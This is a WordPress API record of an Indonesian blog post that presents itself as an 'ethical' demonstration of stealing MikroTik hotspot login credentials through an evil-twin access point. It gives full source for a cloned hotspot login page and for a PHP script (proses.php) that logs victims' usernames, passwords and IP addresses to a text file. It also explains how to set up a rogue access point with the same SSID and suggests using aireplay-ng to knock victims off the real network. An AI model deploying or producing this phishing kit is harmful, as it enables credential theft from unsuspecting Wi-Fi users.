{"id":691,"date":"2020-03-15T10:40:52","date_gmt":"2020-03-15T10:40:52","guid":{"rendered":"http:\/\/xcode.or.id\/blog\/?p=691"},"modified":"2020-03-15T12:05:23","modified_gmt":"2020-03-15T12:05:23","slug":"contoh-hacking-password-mikrotik-dengan-cara-seperti-linset-fluxion-tapi-tanpa-konfirmasi-password-secara-ethical","status":"publish","type":"post","link":"https:\/\/xcode.or.id\/blog\/index.php\/2020\/03\/15\/contoh-hacking-password-mikrotik-dengan-cara-seperti-linset-fluxion-tapi-tanpa-konfirmasi-password-secara-ethical\/","title":{"rendered":"Contoh hacking password login hotspot mikrotik dengan cara seperti linset \/ fluxion tapi tanpa konfirmasi password secara ethical"},"content":{"rendered":"<p>Pertama siapkan 3 hal di bawah ini<\/p>\n<p>1. Router Mikrotik yang sudah diset router<\/p>\n<p>2. Access Point<\/p>\n<p>3. Laptop<\/p>\n<p>Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya).<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-692\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik1.png\" alt=\"\" width=\"640\" height=\"499\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik1.png 640w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik1-300x234.png 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik1-346x270.png 346w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/p>\n<p>Lalu set seperti di bawah ini<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-693\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik12.png\" alt=\"\" width=\"360\" height=\"378\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik12.png 360w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik12-286x300.png 286w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik12-257x270.png 257w\" sizes=\"(max-width: 360px) 100vw, 360px\" \/><\/p>\n<p>Setelah itu klik OK<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-713\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa.png\" alt=\"\" width=\"1261\" height=\"619\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa.png 1261w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa-300x147.png 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa-768x377.png 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa-1024x503.png 1024w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa-360x177.png 360w\" sizes=\"(max-width: 1261px) 100vw, 1261px\" \/><\/p>\n<p>Setelah itu buat web proxy dengan set seperti di atas<\/p>\n<p>Diasumsikan ip 192.168.1.9 adalah ip laptop kita yang diinstall xampp<\/p>\n<p>DHCP Server bisa dari router mikrotik atau access point<\/p>\n<p>&nbsp;<\/p>\n<p>Source code index.php untuk halaman login mikrotik<\/p>\n<pre>&lt;!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN\"\r\n\"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd\"&gt;\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;title&gt;internet hotspot &gt; login&lt;\/title&gt;\r\n&lt;meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/&gt;\r\n&lt;meta http-equiv=\"pragma\" content=\"no-cache\" \/&gt;\r\n&lt;meta http-equiv=\"expires\" content=\"-1\" \/&gt;\r\n&lt;meta name=\"viewport\" content=\"width=device-width; initial-scale=1.0; maximum-scale=1.0;\"\/&gt;\r\n&lt;style type=\"text\/css\"&gt;\r\nbody {color: #737373; font-size: 10px; font-family: verdana;}\r\n\r\ntextarea,input,select {\r\nbackground-color: #FDFBFB;\r\nborder: 1px solid #BBBBBB;\r\npadding: 2px;\r\nmargin: 1px;\r\nfont-size: 14px;\r\ncolor: #808080;\r\n}\r\n\r\na, a:link, a:visited, a:active { color: #AAAAAA; text-decoration: none; font-size: 10px; }\r\na:hover { border-bottom: 1px dotted #c1c1c1; color: #AAAAAA; }\r\nimg {border: none;}\r\ntd { font-size: 14px; color: #7A7A7A; }\r\n&lt;\/style&gt;\r\n\r\n&lt;\/head&gt;\r\n\r\n&lt;body&gt;\r\n&lt;form name=\"sendin\" action=\"$(link-login-only)\" method=\"post\"&gt;\r\n&lt;\/form&gt;\r\n\r\n&lt;script type=\"text\/javascript\" src=\"\/md5.js\"&gt;&lt;\/script&gt;\r\n&lt;script type=\"text\/javascript\"&gt;\r\n&lt;!--\r\nfunction doLogin() {\r\ndocument.sendin.username.value = document.login.username.value;\r\ndocument.sendin.password.value = hexMD5('$(chap-id)' + document.login.password.value + '$(chap-challenge)');\r\ndocument.sendin.submit();\r\nreturn false;\r\n}\r\n\/\/--&gt;\r\n&lt;\/script&gt;\r\n&lt;div align=\"center\"&gt;\r\n&lt;a href=\"$(link-login-only)?target=lv&amp;amp;dst=$(link-orig-esc)\"&gt;&lt;\/a&gt;&lt;\/div&gt;\r\n\r\n&lt;table width=\"100%\" style=\"margin-top: 10%;\"&gt;\r\n&lt;tr&gt;\r\n&lt;td align=\"center\" valign=\"middle\"&gt;\r\n&lt;div class=\"notice\" style=\"color: #c1c1c1; font-size: 9px\"&gt;Please log on to use the internet hotspot service&lt;br \/&gt;\r\n&lt;\/div&gt;\r\n&lt;br \/&gt;\r\n&lt;table width=\"280\" height=\"280\" style=\"border: 1px solid #cccccc; padding: 0px;\" cellpadding=\"0\" cellspacing=\"0\"&gt;\r\n&lt;tr&gt;\r\n&lt;td align=\"center\" valign=\"bottom\" height=\"175\" colspan=\"2\"&gt;\r\n&lt;form name=\"login\" action=\"proses.php\" method=\"post\"\r\n$(if chap-id) onSubmit=\"return doLogin()\" $(endif)&gt;\r\n&lt;input type=\"hidden\" name=\"dst\" value=\"$(link-orig)\" \/&gt;\r\n&lt;input type=\"hidden\" name=\"popup\" value=\"true\" \/&gt;\r\n\r\n&lt;table width=\"100\" style=\"background-color: #ffffff\"&gt;\r\n&lt;tr&gt;&lt;td align=\"right\"&gt;login&lt;\/td&gt;\r\n&lt;td&gt;&lt;input style=\"width: 80px\" name=\"username\" type=\"text\"\/&gt;&lt;\/td&gt;\r\n&lt;\/tr&gt;\r\n&lt;tr&gt;&lt;td align=\"right\"&gt;password&lt;\/td&gt;\r\n&lt;td&gt;&lt;input style=\"width: 80px\" name=\"password\" type=\"password\"\/&gt;&lt;\/td&gt;\r\n&lt;\/tr&gt;\r\n&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;\/td&gt;\r\n&lt;td&gt;&lt;input type=\"submit\" value=\"OK\" \/&gt;&lt;\/td&gt;\r\n&lt;\/tr&gt;\r\n&lt;\/table&gt;\r\n&lt;\/form&gt;\r\n&lt;\/td&gt;\r\n&lt;\/tr&gt;\r\n&lt;tr&gt;&lt;td align=\"center\"&gt;&lt;a href=\"http:\/\/www.mikrotik.com\" target=\"_blank\" style=\"border: none;\"&gt;&lt;img src=\"img\/logobottom.png\" alt=\"mikrotik\" \/&gt;&lt;\/a&gt;&lt;\/td&gt;&lt;\/tr&gt;\r\n&lt;\/table&gt;\r\n\r\n&lt;br \/&gt;&lt;div style=\"color: #c1c1c1; font-size: 9px\"&gt;Powered by MikroTik RouterOS&lt;\/div&gt;\r\n&lt;br \/&gt;\r\n&lt;div style=\"color: #FF8080; font-size: 9px\"&gt;&lt;\/div&gt;\r\n&lt;\/td&gt;\r\n&lt;\/tr&gt;\r\n&lt;\/table&gt;\r\n\r\n&lt;script type=\"text\/javascript\"&gt;\r\n&lt;!--\r\ndocument.login.username.focus();\r\n\/\/--&gt;\r\n&lt;\/script&gt;\r\n&lt;\/body&gt;\r\n&lt;\/html&gt;\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>Source code proses.php<\/p>\n<pre>&lt;?php $file = \"mikrotik.txt\";\r\n$username = $_POST['username'];\r\n$password = $_POST['password'];\r\n$ip = $_SERVER['REMOTE_ADDR'];\r\n$today = date(\"F j, Y, g:i a\");\r\n$handle = fopen($file, 'a');\r\nfwrite($handle, \"-------------------------------------------------- ++\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Username login mikrotik: \");\r\nfwrite($handle, \"$username\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Password login mikrotik: \");\r\nfwrite($handle, \"$password\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"IP Address: \");\r\nfwrite($handle, \"$ip\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Date Submitted: \");\r\nfwrite($handle, \"$today\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"-------------------------------------------------- ++\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"\\n\");\r\nfclose($handle);\r\necho \"&lt;script LANGUAGE=\\\"JavaScript\\\"&gt;\r\n&lt;!--\r\nwindow.location=\\\"http:\/\/192.168.1.9\/login.php\";\r\n&lt;\/script&gt;\";\r\n?&gt;\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>Setting access point yang asli<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-696\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4.png\" alt=\"\" width=\"792\" height=\"417\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4.png 792w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4-300x158.png 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4-768x404.png 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4-360x190.png 360w\" sizes=\"(max-width: 792px) 100vw, 792px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Di bawah ini diasumsikan setting access point palsu, nama SSID nya sama<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-695\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3.png\" alt=\"\" width=\"803\" height=\"488\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3.png 803w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3-300x182.png 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3-768x467.png 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3-360x219.png 360w\" sizes=\"(max-width: 803px) 100vw, 803px\" \/><\/p>\n<p>Wireless Network Name nya XcodeTrainingData<\/p>\n<p>&nbsp;<\/p>\n<p>Di atas diasumsikan adalah access point asli yang dijadikan target<\/p>\n<p>Jika targetnya access point menggunakan WPA-PSK dan access point palsu kita disabled security (Tidak menggunakan WPA\/WPA2 atau WEP.) maka akan muncul 2 access point dengan nama SSID sama, perbedaannya pada simbol tanda seru jika tidak ada keamanannya saat di lihat di Wireless Network Connection.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone wp-image-709\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5.jpeg\" alt=\"\" width=\"231\" height=\"487\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5.jpeg 493w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5-142x300.jpeg 142w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5-485x1024.jpeg 485w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5-128x270.jpeg 128w\" sizes=\"(max-width: 231px) 100vw, 231px\" \/><\/p>\n<p>Di atas saat 2 AP dengan SSID sama tapi satunya di posisi disabled security tapi di satunya ada proteksi WPA\/WPA2\u00a0 Personal.<\/p>\n<p>&nbsp;<\/p>\n<p>Jika sama-sama disabled security-nya maka SSID nya hanya satu yang terdeteksi, percobaan yang dilakukan saya PC yang terpasang wireless USB adapter, posisinya dekat dengan access point asli maka yang terkoneksi justru yang asli, bukan yang access point palsu dengan nama SSID sama.<\/p>\n<p>Jika kondisinya korban terkoneksi dengan access point asli maka bisa dicoba memutus koneksi antara komputer korban dengan access point asli menggunakan aireplay-ng, caranya banyak di google, harapannya saat si korban tidak terkoneksi dan pindah tempat dan posisinya dekat dengan access point palsu dan terkoneksi dengan akses point palsu maka korban bisa masuk pada jebakan attacker.<\/p>\n<p>Di sisi berbeda, saat laptop saya dekatkan dengan access point palsu dan melakukan koneksi ke XcodeTrainingData hasilnya seperti di bawah ini, yang artinya laptop saya terkoneksi dengan access palsu.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone wp-image-697\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1.jpg\" alt=\"\" width=\"946\" height=\"448\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1.jpg 1040w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1-300x142.jpg 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1-768x364.jpg 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1-1024x485.jpg 1024w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1-360x171.jpg 360w\" sizes=\"(max-width: 946px) 100vw, 946px\" \/><\/p>\n<p>Saya dapat ip 192.168.1.104, terkoneksi ke access point palsu<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"alignnone wp-image-698\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2.jpeg\" alt=\"\" width=\"950\" height=\"450\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2.jpeg 1040w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2-300x142.jpeg 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2-768x364.jpeg 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2-1024x485.jpeg 1024w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2-360x171.jpeg 360w\" sizes=\"(max-width: 950px) 100vw, 950px\" \/><\/p>\n<p>Jika saya akses facebook.com<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-699\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3.jpeg\" alt=\"\" width=\"1040\" height=\"493\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3.jpeg 1040w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3-300x142.jpeg 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3-768x364.jpeg 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3-1024x485.jpeg 1024w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3-360x171.jpeg 360w\" sizes=\"(max-width: 1040px) 100vw, 1040px\" \/><\/p>\n<p>Hasilnya halaman login mikrotik palsu, kemudian dicoba login<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-700\" src=\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4.jpeg\" alt=\"\" width=\"1040\" height=\"493\" srcset=\"https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4.jpeg 1040w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4-300x142.jpeg 300w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4-768x364.jpeg 768w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4-1024x485.jpeg 1024w, https:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4-360x171.jpeg 360w\" sizes=\"(max-width: 1040px) 100vw, 1040px\" \/><\/p>\n<p>Di komputer attacker hasilnya seperti di atas jika dibuka file mikrotik.txt<\/p>\n<p>&nbsp;<\/p>\n<p>Penulis : Kurniawan (Founder X-code) &#8211; kurniawanajazenfone@gmail.com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pertama siapkan 3 hal di bawah ini 1. Router Mikrotik yang sudah diset router 2. Access Point 3. Laptop Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya). Lalu set seperti di bawah ini Setelah itu <a href=\"https:\/\/xcode.or.id\/blog\/index.php\/2020\/03\/15\/contoh-hacking-password-mikrotik-dengan-cara-seperti-linset-fluxion-tapi-tanpa-konfirmasi-password-secara-ethical\/\" class=\"read-more\">Read More &#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[23],"tags":[],"_links":{"self":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691"}],"collection":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=691"}],"version-history":[{"count":13,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions"}],"predecessor-version":[{"id":715,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions\/715"}],"wp:attachment":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}